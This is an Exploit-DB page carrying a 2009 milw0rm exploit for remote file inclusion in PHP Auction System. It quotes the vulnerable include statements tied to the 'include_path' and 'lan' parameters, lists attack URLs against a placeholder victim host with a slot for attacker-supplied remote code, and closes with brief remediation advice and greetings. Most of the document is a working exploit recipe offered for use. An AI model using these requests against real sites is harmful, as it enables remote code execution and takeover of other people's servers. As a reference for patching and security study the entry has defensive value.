PHPAuctionSystem - Multiple Remote File Inclusions

EDB-ID:

7678

CVE:

N/A

EDB Verified:

Author:

darkmasking

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2009-01-06

Vulnerable App: 
[»]=======================================================================================================[_][-][X]
[»]                                                                             				[»]
[»]      		   PHPAuctionSystem Multiple Remote File Inclusion Vulnerability    			[»]
[»]              				         							[»]
[»]            		 	=======    ------d-------m------     ====    ====   				[»]
[»]             	 	||     =        | |(o o)| |          ||   ||   ||   				[»]
[»]             		||     =          ||(~)||            ||        ||   				[»]
[»]             	 	=======             /|\              ||        ||  				[»]
[»]=============================================================================================================[»]
[»] 				Author         	: ~darkmasking~		 					[»]
[»] 				Date           	: January, 6th 2009           					[»]
[»] 				Web           	: https://www.idsafeshield.com					[»]
[»]           		 	Contact        	: support[at]idsafeshield[dot]com  				[»]
[»]					Critical Level 	: Dangerous			  			[»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»]              		       Affected software description :        					[»]
[»]   				Software 	: PHP Auction System						[»]
[»]          			Vendor		: http://www.phpauctions.info/					[»]
[»]            			Price 	      	: $59.99							[»]
[»]=============================================================================================================[»]
[»]														[»]
[»]	[~] Vulnerable file											[»]
[»]														[»]
[»]		[+] all file below is affected by "include_path" parameter					[»]
[»]														[»]
[»]		./includes/settings.inc.php									[»]
[»]		$password_file = $include_path."passwd.inc.php";						[»]
[»]		include($password_file);									[»]
[»]		include $include_path."fonts.inc.php";								[»]
[»]		include $include_path."fontsize.inc.php";							[»]
[»]		include($include_path."currency.inc.php");							[»]
[»]		include($include_path."errors.inc.php");							[»]
[»]		include($include_path."https.inc.php");								[»]
[»]														[»]
[»]		./includes/auction_confirmation.inc.php								[»]
[»]		require("./includes/messages.inc.php");								[»]
[»]														[»]
[»]		./includes/converter.inc.php									[»]
[»]		include($include_path."nusoap.php");								[»]
[»]														[»]
[»]		./includes/messages.inc.php									[»]
[»]		require($include_path.'messages.'.$language.'.inc.php');					[»]
[»]														[»]
[»]		./includes/stats.inc.php									[»]
[»]		include $prefix."includes/useragent.inc.php";							[»]
[»]		include $prefix."includes/domains.inc.php";							[»]
[»]														[»]
[»]		./includes/useragent.inc.php									[»]
[»]		include $prefix."includes/browsers.inc.php";							[»]
[»]		include $prefix."includes/platforms.inc.php";							[»]
[»]														[»]
[»]		./includes/user_confirmation.inc.php								[»]
[»]		require("./includes/messages.inc.php");								[»]
[»]														[»]
[»]														[»]
[»]		[+] All file below is affected by "lan" parameter						[»]
[»]														[»]
[»]		./browse.php											[»]
[»]		./search.php											[»]
[»]		if(!empty($_GET['lan'])) {									[»]
[»]			$language = $lan;									[»]
[»]			$_SESSION['language'] = $language;							[»]
[»]														[»]
[»]		#// Set language cookie										[»]
[»]			setcookie("USERLANGUAGE",$lan,time()+31536000,"/");					[»]
[»]		} elseif(empty($_SESSION['language']) && !isset($_COOKIE['USERLANGUAGE'])) {			[»]
[»]			$language = $SETTINGS['defaultlanguage'];						[»]
[»]			$_SESSION['language'] = $language;							[»]
[»]														[»]
[»]		#// Set language cookie										[»]
[»]			setcookie("USERLANGUAGE",$language,time()+31536000);					[»]
[»]		} elseif(isset($_COOKIE['USERLANGUAGE'])) {							[»]
[»]			$language = $_COOKIE['USERLANGUAGE'];							[»]
[»]		}												[»]
[»]														[»]
[»]		require($include_path.'messages.'.$language.'.inc.php');					[»]
[»]														[»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»]														[»]
[»]	[~] Exploit												[»]
[»]														[»]
[»]	[+] "include_path" parameter										[»]
[»]														[»]
[»]	http://www.darkvictims.com/[path]/includes/settings.inc.php?include_path=[darkcode]			[»]
[»]	http://www.darkvictims.com/[path]/includes/auction_confirmation.inc.php?include_path=[darkcode]		[»]
[»]	http://www.darkvictims.com/[path]/includes/converter.inc.php?include_path=[darkcode]			[»]
[»]	http://www.darkvictims.com/[path]/includes/messages.inc.php?include_path=[darkcode]			[»]
[»]	http://www.darkvictims.com/[path]/includes/stats.inc.php?include_path=[darkcode]			[»]
[»]	http://www.darkvictims.com/[path]/includes/useragent.inc.php?include_path=[darkcode]			[»]
[»]	http://www.darkvictims.com/[path]/includes/user_confirmation.inc.php?include_path=[darkcode]		[»]
[»]														[»]
[»]														[»]
[»]	[+] "lan" parameter											[»]
[»]														[»]
[»]	http://www.darkvictims.com/[path]/browse.php?lan=[darkcode]						[»]
[»]	http://www.darkvictims.com/[path]/search.php?lan=[darkcode]						[»]
[»]														[»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»]														[»]
[»] 	[~] How to fix this vulnerability									[»]
[»]														[»]
[»]    	Edit the source code to ensure that input is properly validated. Where is possible, 			[»]
[»]    	it is recommended to make a list of accepted filenames and restrict the input to that list.		[»]
[»]														[»]
[»]    	For PHP, the option allow_url_fopen would normally allow a programmer to open, 				[»]
[»]    	include or otherwise use a remote file using a URL rather than a local file path. 			[»]
[»]    	It is recommended to disable this option from php.ini.							[»]
[»]														[»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»]														[»]
[»]	[~] Greetz												[»]
[»]														[»]
[»]	BUAT DIRI SENDIRI AJA [ Sorry Bro belum dapat teman :) ]						[»]
[»]														[»]
[»]														[»]
[»]=============================================================================================================[»]

# milw0rm.com [2009-01-06]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services